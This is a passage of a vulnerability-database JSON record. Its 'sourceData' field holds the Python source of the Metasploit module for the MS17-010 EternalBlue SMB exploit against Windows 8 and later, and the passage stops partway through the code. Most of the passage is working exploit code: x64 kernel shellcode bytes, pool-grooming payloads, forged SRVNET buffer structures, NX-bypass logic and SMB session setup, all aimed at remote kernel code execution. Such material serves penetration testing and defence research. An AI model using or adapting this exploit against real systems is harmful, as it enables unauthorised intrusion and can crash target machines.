["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2020-03-25T08:38:40", "value": 7.3, "vector": "NONE"}}, "hash": "f25f6250688bcfa885a6da7e950069c6", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "lastseen": "2020-03-25T08:38:40", "metasploitHistory": "", "metasploitReliability": "", "modified": "2019-11-02T02:20:22", "objectVersion": "1.4", "published": "2018-06-15T18:36:54", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", "title": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+", "type": "metasploit", "viewCount": 69}, "differentElements": ["sourceData"], "edition": 87, "lastseen": "2020-03-25T08:38:40"}], "viewCount": 604, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2020-09-18T18:32:29", "rev": 2}, "score": {"value": 7.9, "vector": "NONE", "modified": "2020-09-18T18:32:29", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", "sourceData": "#!/usr/bin/env python\n\nimport sys\nimport socket\nfrom struct import pack\nfrom base64 import b64decode\n\ntry:\n from impacket import smb, ntlm\nexcept ImportError:\n dependencies_missing = True\nelse:\n dependencies_missing = False\n\nfrom metasploit import module\n\nmetadata = {\n 'name': 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+',\n 'description': '''\n EternalBlue exploit for Windows 8, Windows 10, and 2012 by sleepya\n The exploit might FAIL and CRASH a target system (depended on what is overwritten)\n The exploit support only x64 target\n\n Tested on:\n - Windows 2012 R2 x64\n - Windows 8.1 x64\n - Windows 10 Pro Build 10240 x64\n - Windows 10 Enterprise Evaluation Build 10586 x64\n\n\n Default Windows 8 and later installation without additional service info:\n - anonymous is not allowed to access any share (including IPC$)\n - More info: https://support.microsoft.com/en-us/help/3034016/ipc-share-and-null-session-behavior-in-windows\n - tcp port 445 is filtered by firewall\n\n\n Reference:\n - http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/\n - \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" https://drive.google.com/file/d/0B3P18M-shbwrNWZTa181ZWRCclk/edit\n\n\n Exploit info:\n - If you do not know how exploit for Windows 7/2008 work. Please read my exploit for Windows 7/2008 at\n https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a because the trick for exploit is almost the same\n - The exploit use heap of HAL for placing fake struct (address 0xffffffffffd00e00) and shellcode (address 0xffffffffffd01000).\n On Windows 8 and Wndows 2012, the NX bit is set on this memory page. Need to disable it before controlling RIP.\n - The exploit is likely to crash a target when it failed\n - The overflow is happened on nonpaged pool so we need to massage target nonpaged pool.\n - If exploit failed but target does not crash, try increasing 'GroomAllocations' value (at least 5)\n - See the code and comment for exploit detail.\n\n\n Disable NX method:\n - The idea is from \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" (see link in reference)\n - The exploit is also the same but we need to trigger bug twice\n - First trigger, set MDL.MappedSystemVa to target pte address\n - Write '\\\\x00' to disable the NX flag\n - Second trigger, do the same as Windows 7 exploit\n - From my test, if exploit disable NX successfully, I always get code execution\n ''',\n 'authors': [\n 'Equation Group', # OG research and exploit\n 'Shadow Brokers', # Hack and dump\n 'sleepya', # Research and PoC\n 'wvu' # Babby's first external module\n ],\n 'references': [\n {'type': 'msb', 'ref': 'MS17-010'},\n {'type': 'cve', 'ref': '2017-0143'},\n {'type': 'cve', 'ref': '2017-0144'},\n {'type': 'cve', 'ref': '2017-0145'},\n {'type': 'cve', 'ref': '2017-0146'},\n {'type': 'cve', 'ref': '2017-0147'},\n {'type': 'cve', 'ref': '2017-0148'},\n {'type': 'edb', 'ref': '42030'},\n {'type': 'url', 'ref': 'https://github.com/worawit/MS17-010'}\n ],\n 'date': 'Mar 14 2017',\n 'type': 'remote_exploit',\n 'rank': 'average',\n 'privileged': True,\n 'wfsdelay': 5,\n 'targets': [\n {'platform': 'win', 'arch': 'x64'}\n ],\n 'options': {\n 'RHOST': {'type': 'address', 'description': 'Target server', 'required': True, 'default': None},\n 'RPORT': {'type': 'port', 'description': 'Target server port', 'required': True, 'default': 445},\n 'ProcessName': {'type': 'string', 'description': 'Process to inject payload into.', 'required': False, 'default': 'spoolsv.exe'}, \n 'GroomAllocations': {'type': 'int', 'description': 'Initial number of times to groom the kernel pool.', 'required': True, 'default': 13},\n # if anonymous can access any share folder, 'IPC$' is always accessible.\n # authenticated user is always able to access 'IPC$'.\n # Windows 2012 does not allow anonymous to login if no share is accessible.\n 'SMBUser': {'type': 'string', 'description': '(Optional) The username to authenticate as', 'required': False, 'default': ''},\n 'SMBPass': {'type': 'string', 'description': '(Optional) The password for the specified username', 'required': False, 'default': ''}\n },\n 'notes': {\n 'AKA': ['ETERNALBLUE']\n }\n}\n\n\n\ndef hash(process): \n # calc_hash from eternalblue_kshellcode_x64.asm \n proc_hash = 0\n for c in str( process + \"\\x00\" ):\n proc_hash = ror( proc_hash, 13 )\n proc_hash += ord( c )\n return pack('<I', proc_hash)\n\ndef ror( dword, bits ):\n return ( dword >> bits | dword << ( 32 - bits ) ) & 0xFFFFFFFF\n\n# git clone https://github.com/worawit/MS17-010\n# cd MS17-010/shellcode\n# nasm -f bin eternalblue_kshellcode_x64.asm -o eternalblue_kshellcode_x64.bin\ndef eternalblue_kshellcode_x64(process=\"spoolsv.exe\"):\n proc_hash = hash(process)\n return (\n '\\x55\\xe8\\x2e\\x00\\x00\\x00\\xb9\\x82\\x00\\x00\\xc0\\x0f\\x32\\x4c\\x8d'\n '\\x0d\\x34\\x00\\x00\\x00\\x44\\x39\\xc8\\x74\\x19\\x39\\x45\\x00\\x74\\x0a'\n '\\x89\\x55\\x04\\x89\\x45\\x00\\xc6\\x45\\xf8\\x00\\x49\\x91\\x50\\x5a\\x48'\n '\\xc1\\xea\\x20\\x0f\\x30\\x5d\\xc3\\x48\\x8d\\x2d\\x00\\x10\\x00\\x00\\x48'\n '\\xc1\\xed\\x0c\\x48\\xc1\\xe5\\x0c\\x48\\x83\\xed\\x70\\xc3\\x0f\\x01\\xf8'\n '\\x65\\x48\\x89\\x24\\x25\\x10\\x00\\x00\\x00\\x65\\x48\\x8b\\x24\\x25\\xa8'\n '\\x01\\x00\\x00\\x6a\\x2b\\x65\\xff\\x34\\x25\\x10\\x00\\x00\\x00\\x50\\x50'\n '\\x55\\xe8\\xc5\\xff\\xff\\xff\\x48\\x8b\\x45\\x00\\x48\\x83\\xc0\\x1f\\x48'\n '\\x89\\x44\\x24\\x10\\x51\\x52\\x41\\x50\\x41\\x51\\x41\\x52\\x41\\x53\\x31'\n '\\xc0\\xb2\\x01\\xf0\\x0f\\xb0\\x55\\xf8\\x75\\x14\\xb9\\x82\\x00\\x00\\xc0'\n '\\x8b\\x45\\x00\\x8b\\x55\\x04\\x0f\\x30\\xfb\\xe8\\x0e\\x00\\x00\\x00\\xfa'\n '\\x41\\x5b\\x41\\x5a\\x41\\x59\\x41\\x58\\x5a\\x59\\x5d\\x58\\xc3\\x41\\x57'\n '\\x41\\x56\\x57\\x56\\x53\\x50\\x4c\\x8b\\x7d\\x00\\x49\\xc1\\xef\\x0c\\x49'\n '\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x66\\x41\\x81\\x3f\\x4d'\n '\\x5a\\x75\\xf1\\x4c\\x89\\x7d\\x08\\x65\\x4c\\x8b\\x34\\x25\\x88\\x01\\x00'\n '\\x00\\xbf\\x78\\x7c\\xf4\\xdb\\xe8\\x01\\x01\\x00\\x00\\x48\\x91\\xbf\\x3f'\n '\\x5f\\x64\\x77\\xe8\\xfc\\x00\\x00\\x00\\x8b\\x40\\x03\\x89\\xc3\\x3d\\x00'\n '\\x04\\x00\\x00\\x72\\x03\\x83\\xc0\\x10\\x48\\x8d\\x50\\x28\\x4c\\x8d\\x04'\n '\\x11\\x4d\\x89\\xc1\\x4d\\x8b\\x09\\x4d\\x39\\xc8\\x0f\\x84\\xc6\\x00\\x00'\n '\\x00\\x4c\\x89\\xc8\\x4c\\x29\\xf0\\x48\\x3d\\x00\\x07\\x00\\x00\\x77\\xe6'\n '\\x4d\\x29\\xce\\xbf\\xe1\\x14\\x01\\x17\\xe8\\xbb\\x00\\x00\\x00\\x8b\\x78'\n '\\x03\\x83\\xc7\\x08\\x48\\x8d\\x34\\x19\\xe8\\xf4\\x00\\x00\\x00\\x3d' + proc_hash +\n '\\x74\\x10\\x3d' + proc_hash + '\\x74\\x09\\x48\\x8b\\x0c' \n '\\x39\\x48\\x29\\xf9\\xeb\\xe0\\xbf\\x48\\xb8\\x18\\xb8\\xe8\\x84\\x00\\x00'\n '\\x00\\x48\\x89\\x45\\xf0\\x48\\x8d\\x34\\x11\\x48\\x89\\xf3\\x48\\x8b\\x5b'\n '\\x08\\x48\\x39\\xde\\x74\\xf7\\x4a\\x8d\\x14\\x33\\xbf\\x3e\\x4c\\xf8\\xce'\n '\\xe8\\x69\\x00\\x00\\x00\\x8b\\x40\\x03\\x48\\x83\\x7c\\x02\\xf8\\x00\\x74'\n '\\xde\\x48\\x8d\\x4d\\x10\\x4d\\x31\\xc0\\x4c\\x8d\\x0d\\xa9\\x00\\x00\\x00'\n '\\x55\\x6a\\x01\\x55\\x41\\x50\\x48\\x83\\xec\\x20\\xbf\\xc4\\x5c\\x19\\x6d'\n '\\xe8\\x35\\x00\\x00\\x00\\x48\\x8d\\x4d\\x10\\x4d\\x31\\xc9\\xbf\\x34\\x46'\n '\\xcc\\xaf\\xe8\\x24\\x00\\x00\\x00\\x48\\x83\\xc4\\x40\\x85\\xc0\\x74\\xa3'\n '\\x48\\x8b\\x45\\x20\\x80\\x78\\x1a\\x01\\x74\\x09\\x48\\x89\\x00\\x48\\x89'\n '\\x40\\x08\\xeb\\x90\\x58\\x5b\\x5e\\x5f\\x41\\x5e\\x41\\x5f\\xc3\\xe8\\x02'\n '\\x00\\x00\\x00\\xff\\xe0\\x53\\x51\\x56\\x41\\x8b\\x47\\x3c\\x41\\x8b\\x84'\n '\\x07\\x88\\x00\\x00\\x00\\x4c\\x01\\xf8\\x50\\x8b\\x48\\x18\\x8b\\x58\\x20'\n '\\x4c\\x01\\xfb\\xff\\xc9\\x8b\\x34\\x8b\\x4c\\x01\\xfe\\xe8\\x1f\\x00\\x00'\n '\\x00\\x39\\xf8\\x75\\xef\\x58\\x8b\\x58\\x24\\x4c\\x01\\xfb\\x66\\x8b\\x0c'\n '\\x4b\\x8b\\x58\\x1c\\x4c\\x01\\xfb\\x8b\\x04\\x8b\\x4c\\x01\\xf8\\x5e\\x59'\n '\\x5b\\xc3\\x52\\x31\\xc0\\x99\\xac\\xc1\\xca\\x0d\\x01\\xc2\\x85\\xc0\\x75'\n '\\xf6\\x92\\x5a\\xc3\\x55\\x53\\x57\\x56\\x41\\x57\\x49\\x8b\\x28\\x4c\\x8b'\n '\\x7d\\x08\\x52\\x5e\\x4c\\x89\\xcb\\x31\\xc0\\x44\\x0f\\x22\\xc0\\x48\\x89'\n '\\x02\\x89\\xc1\\x48\\xf7\\xd1\\x49\\x89\\xc0\\xb0\\x40\\x50\\xc1\\xe0\\x06'\n '\\x50\\x49\\x89\\x01\\x48\\x83\\xec\\x20\\xbf\\xea\\x99\\x6e\\x57\\xe8\\x65'\n '\\xff\\xff\\xff\\x48\\x83\\xc4\\x30\\x85\\xc0\\x75\\x45\\x48\\x8b\\x3e\\x48'\n '\\x8d\\x35\\x4d\\x00\\x00\\x00\\xb9\\x00\\x06\\x00\\x00\\xf3\\xa4\\x48\\x8b'\n '\\x45\\xf0\\x48\\x8b\\x40\\x18\\x48\\x8b\\x40\\x20\\x48\\x8b\\x00\\x66\\x83'\n '\\x78\\x48\\x18\\x75\\xf6\\x48\\x8b\\x50\\x50\\x81\\x7a\\x0c\\x33\\x00\\x32'\n '\\x00\\x75\\xe9\\x4c\\x8b\\x78\\x20\\xbf\\x5e\\x51\\x5e\\x83\\xe8\\x22\\xff'\n '\\xff\\xff\\x48\\x89\\x03\\x31\\xc9\\x88\\x4d\\xf8\\xb1\\x01\\x44\\x0f\\x22'\n '\\xc1\\x41\\x5f\\x5e\\x5f\\x5b\\x5d\\xc3\\x48\\x92\\x31\\xc9\\x51\\x51\\x49'\n '\\x89\\xc9\\x4c\\x8d\\x05\\x0d\\x00\\x00\\x00\\x89\\xca\\x48\\x83\\xec\\x20'\n '\\xff\\xd0\\x48\\x83\\xc4\\x30\\xc3'\n )\n\n# because the srvnet buffer is changed dramatically from Windows 7, I have to choose NTFEA size to 0x9000\nNTFEA_SIZE = 0x9000\n\nntfea9000 = (pack('<BBH', 0, 0, 0) + '\\x00')*0x260 # with these fea, ntfea size is 0x1c80\nntfea9000 += pack('<BBH', 0, 0, 0x735c) + '\\x00'*0x735d # 0x8fe8 - 0x1c80 - 0xc = 0x735c\nntfea9000 += pack('<BBH', 0, 0, 0x8147) + '\\x00'*0x8148 # overflow to SRVNET_BUFFER_HDR\n\n'''\nReverse from srvnet.sys (Win2012 R2 x64)\n- SrvNetAllocateBufferFromPool() and SrvNetWskTransformedReceiveComplete():\n\n// size 0x90\nstruct SRVNET_BUFFER_HDR {\n LIST_ENTRY list;\n USHORT flag; // 2 least significant bit MUST be clear. if 0x1 is set, pmdl pointers are access. if 0x2 is set, go to lookaside.\n char unknown0[6];\n char *pNetRawBuffer; // MUST point to valid address (check if this request is \"\\xfdSMB\")\n DWORD netRawBufferSize; // offset: 0x20\n DWORD ioStatusInfo;\n DWORD thisNonPagedPoolSize; // will be 0x82e8 for netRawBufferSize 0x8100\n DWORD pad2;\n char *thisNonPagedPoolAddr; // 0x30 points to SRVNET_BUFFER\n PMDL pmdl1; // point at offset 0x90 from this struct\n DWORD nByteProcessed; // 0x40\n char unknown4[4];\n QWORD smbMsgSize; // MUST be modified to size of all recv data\n PMDL pmdl2; // 0x50: if want to free corrupted buffer, need to set to valid address\n QWORD pSrvNetWskStruct; // want to change to fake struct address\n DWORD unknown6; // 0x60\n char unknown7[12];\n char unknown8[0x20];\n};\n\nstruct SRVNET_BUFFER {\n char transportHeader[80]; // 0x50\n char buffer[reqSize+padding]; // 0x8100 (for pool size 0x82f0), 0x10100 (for pool size 0x11000)\n SRVNET_BUFFER_HDR hdr; //some header size 0x90\n //MDL mdl1; // target\n};\n\nIn Windows 8, the srvnet buffer metadata is declared after real buffer. We need to overflow through whole receive buffer.\nBecause transaction max data count is 66512 (0x103d0) in SMB_COM_NT_TRANSACT command and\n DataDisplacement is USHORT in SMB_COM_TRANSACTION2_SECONDARY command, we cannot send large trailing data after FEALIST.\nSo the possible srvnet buffer pool size is 0x82f0. With this pool size, we need to overflow more than 0x8150 bytes.\nIf exploit cannot overflow to prepared SRVNET_BUFFER, the target is likely to crash because of big overflow.\n'''\n# Most field in overwritten (corrupted) srvnet struct can be any value because it will be left without free (memory leak) after processing\n# Here is the important fields on x64\n# - offset 0x18 (VOID*) : pointer to received SMB message buffer. This value MUST be valid address because there is\n# a check in SrvNetWskTransformedReceiveComplete() if this message starts with \"\\xfdSMB\".\n# - offset 0x48 (QWORD) : the SMB message length from packet header (first 4 bytes).\n# This value MUST be exactly same as the number of bytes we send.\n# Normally, this value is 0x80 + len(fake_struct) + len(shellcode)\n# - offset 0x58 (VOID*) : pointer to a struct contained pointer to function. the pointer to function is called when done receiving SMB request.\n# The value MUST point to valid (might be fake) struct.\n# - offset 0x90 (MDL) : MDL for describe receiving SMB request buffer\n# - 0x90 (VOID*) : MDL.Next should be NULL\n# - 0x98 (USHORT) : MDL.Size should be some value that not too small\n# - 0x9a (USHORT) : MDL.MdlFlags should be 0x1004 (MDL_NETWORK_HEADER|MDL_SOURCE_IS_NONPAGED_POOL)\n# - 0x90 (VOID*) : MDL.Process should be NULL\n# - 0x98 (VOID*) : MDL.MappedSystemVa MUST be a received network buffer address. Controlling this value get arbitrary write.\n# The address for arbitrary write MUST be subtracted by a number of sent bytes (0x80 in this exploit).\n#\n#\n# To free the corrupted srvnet buffer (not necessary), shellcode MUST modify some memory value to satisfy condition.\n# Here is related field for freeing corrupted buffer\n# - offset 0x10 (USHORT): 2 least significant bit MUST be clear. Just set to 0xfff0\n# - offset 0x30 (VOID*) : MUST be fixed to correct value in shellcode. This is the value that passed to ExFreePoolWithTag()\n# - offset 0x40 (DWORD) : be a number of total byte received. This field MUST be set by shellcode because SrvNetWskReceiveComplete() set it to 0\n# before calling SrvNetCommonReceiveHandler(). This is possible because pointer to SRVNET_BUFFER struct is passed to\n# your shellcode as function argument\n# - offset 0x50 (PMDL) : points to any fake MDL with MDL.Flags 0x20 does not set\n# The last condition is your shellcode MUST return non-negative value. The easiest way to do is \"xor eax,eax\" before \"ret\".\n# Here is x64 assembly code for setting nByteProcessed field\n# - fetch SRVNET_BUFFER address from function argument\n# \\x48\\x8b\\x54\\x24\\x40 mov rdx, [rsp+0x40]\n# - fix pool pointer (rcx is -0x8150 because of fake_recv_struct below)\n# \\x48\\x01\\xd1 add rcx, rdx\n# \\x48\\x89\\x4a\\x30 mov [rdx+0x30], rcx\n# - set nByteProcessed for trigger free after return\n# \\x8b\\x4a\\x48 mov ecx, [rdx+0x48]\n# \\x89\\x4a\\x40 mov [rdx+0x40], ecx\n\n# debug mode affects HAL heap. The 0xffffffffffd04000 address should be useable no matter what debug mode is.\n# The 0xffffffffffd00000 address should be useable when debug mode is not enabled\n# The 0xffffffffffd01000 address should be useable when debug mode is enabled\nTARGET_HAL_HEAP_ADDR = 0xffffffffffd04000 # for put fake struct and shellcode\n\n# Note: feaList will be created after knowing shellcode size.\n\n# feaList for disabling NX is possible because we just want to change only MDL.MappedSystemVa\n# PTE of 0xffffffffffd00000 is at 0xfffff6ffffffe800\n# NX bit is at PTE_ADDR+7\n# MappedSystemVa = PTE_ADDR+7 - 0x7f\nSHELLCODE_PAGE_ADDR = (TARGET_HAL_HEAP_ADDR + 0x400) & 0xfffffffffffff000\nPTE_ADDR = 0xfffff6ffffffe800 + 8*((SHELLCODE_PAGE_ADDR-0xffffffffffd00000) >> 12)\nfakeSrvNetBufferX64Nx = '\\x00'*16\nfakeSrvNetBufferX64Nx += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR)\nfakeSrvNetBufferX64Nx += '\\x00'*16\nfakeSrvNetBufferX64Nx += '\\x00'*16\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, 0)\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR) # _, _, pointer to fake struct\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, 0)\nfakeSrvNetBufferX64Nx += '\\x00'*16\nfakeSrvNetBufferX64Nx += '\\x00'*16\nfakeSrvNetBufferX64Nx += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, PTE_ADDR+7-0x7f) # MDL.Process, MDL.MappedSystemVa\n\nfeaListNx = pack('<I', 0x10000)\nfeaListNx += ntfea9000\nfeaListNx += pack('<BBH', 0, 0, len(fakeSrvNetBufferX64Nx)-1) + fakeSrvNetBufferX64Nx # -1 because first '\\x00' is for name\n# stop copying by invalid flag (can be any value except 0 and 0x80)\nfeaListNx += pack('<BBH', 0x12, 0x34, 0x5678)\n\n\ndef createFakeSrvNetBuffer(sc_size):\n # 0x180 is size of fakeSrvNetBufferX64\n totalRecvSize = 0x80 + 0x180 + sc_size\n fakeSrvNetBufferX64 = '\\x00'*16\n fakeSrvNetBufferX64 += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR) # flag, _, _, pNetRawBuffer\n fakeSrvNetBufferX64 += pack('<QII', 0, 0x82e8, 0) # _, thisNonPagedPoolSize, _\n fakeSrvNetBufferX64 += '\\x00'*16\n fakeSrvNetBufferX64 += pack('<QQ', 0, totalRecvSize) # offset 0x40\n fakeSrvNetBufferX64 += pack('<QQ', TARGET_HAL_HEAP_ADDR, TARGET_HAL_HEAP_ADDR) # pmdl2, pointer to fake struct\n fakeSrvNetBufferX64 += pack('<QQ', 0, 0)\n fakeSrvNetBufferX64 += '\\x00'*16\n fakeSrvNetBufferX64 += '\\x00'*16\n fakeSrvNetBufferX64 += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags\n fakeSrvNetBufferX64 += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR-0x80) # MDL.Process, MDL.MappedSystemVa\n return fakeSrvNetBufferX64\n\ndef createFeaList(sc_size):\n feaList = pack('<I', 0x10000)\n feaList += ntfea9000\n fakeSrvNetBuf = createFakeSrvNetBuffer(sc_size)\n feaList += pack('<BBH', 0, 0, len(fakeSrvNetBuf)-1) + fakeSrvNetBuf # -1 because first '\\x00' is for name\n # stop copying by invalid flag (can be any value except 0 and 0x80)\n feaList += pack('<BBH', 0x12, 0x34, 0x5678)\n return feaList\n\n# fake struct for SrvNetWskTransformedReceiveComplete() and SrvNetCommonReceiveHandler()\n# x64: fake struct is at ffffffff ffd00e00\n# offset 0x50: KSPIN_LOCK\n# offset 0x58: LIST_ENTRY must be valid address. cannot be NULL.\n# offset 0x110: array of pointer to function\n# offset 0x13c: set to 3 (DWORD) for invoking ptr to function\n# some useful offset\n# offset 0x120: arg1 when invoking ptr to function\n# offset 0x128: arg2 when invoking ptr to function\n#\n# code path to get code exection after this struct is controlled\n# SrvNetWskTransformedReceiveComplete() -> SrvNetCommonReceiveHandler() -> call fn_ptr\nfake_recv_struct = ('\\x00'*16)*5\nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x58) # offset 0x50: KSPIN_LOCK, (LIST_ENTRY to itself)\nfake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x58, 0) # offset 0x60\nfake_recv_struct += ('\\x00'*16)*10\nfake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x170, 0) # offset 0x110: fn_ptr array\nfake_recv_struct += pack('<QQ', (0x8150^0xffffffffffffffff)+1, 0) # set arg1 to -0x8150\nfake_recv_struct += pack('<QII', 0, 0, 3) # offset 0x130\nfake_recv_struct += ('\\x00'*16)*3\nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x180) # shellcode address\n\n\ndef getNTStatus(self):\n return (self['ErrorCode'] << 16) | (self['_reserved'] << 8) | self['ErrorClass']\nif not dependencies_missing:\n setattr(smb.NewSMBPacket, \"getNTStatus\", getNTStatus)\n\ndef sendEcho(conn, tid, data):\n pkt = smb.NewSMBPacket()\n pkt['Tid'] = tid\n\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_ECHO)\n transCommand['Parameters'] = smb.SMBEcho_Parameters()\n transCommand['Data'] = smb.SMBEcho_Data()\n\n transCommand['Parameters']['EchoCount'] = 1\n transCommand['Data']['Data'] = data\n pkt.addCommand(transCommand)\n\n conn.sendSMB(pkt)\n recvPkt = conn.recvSMB()\n if recvPkt.getNTStatus() == 0:\n module.log('got good ECHO response')\n else:\n module.log('got bad ECHO response: 0x{:x}'.format(recvPkt.getNTStatus()), 'error')\n\n\n# override SMB.neg_session() to allow forcing ntlm authentication\nif not dependencies_missing:\n class MYSMB(smb.SMB):\n def __init__(self, remote_host, port, use_ntlmv2=True):\n self.__use_ntlmv2 = use_ntlmv2\n smb.SMB.__init__(self, remote_host, remote_host, sess_port = port)\n\n def neg_session(self, extended_security = True, negPacket = None):\n smb.SMB.neg_session(self, extended_security=self.__use_ntlmv2, negPacket=negPacket)\n\ndef createSessionAllocNonPaged(target, port, size, username, password):\n conn = MYSMB(target, port, use_ntlmv2=False) # with this negotiation, FLAGS2_EXTENDED_SECURITY is not set\n _, flags2 = 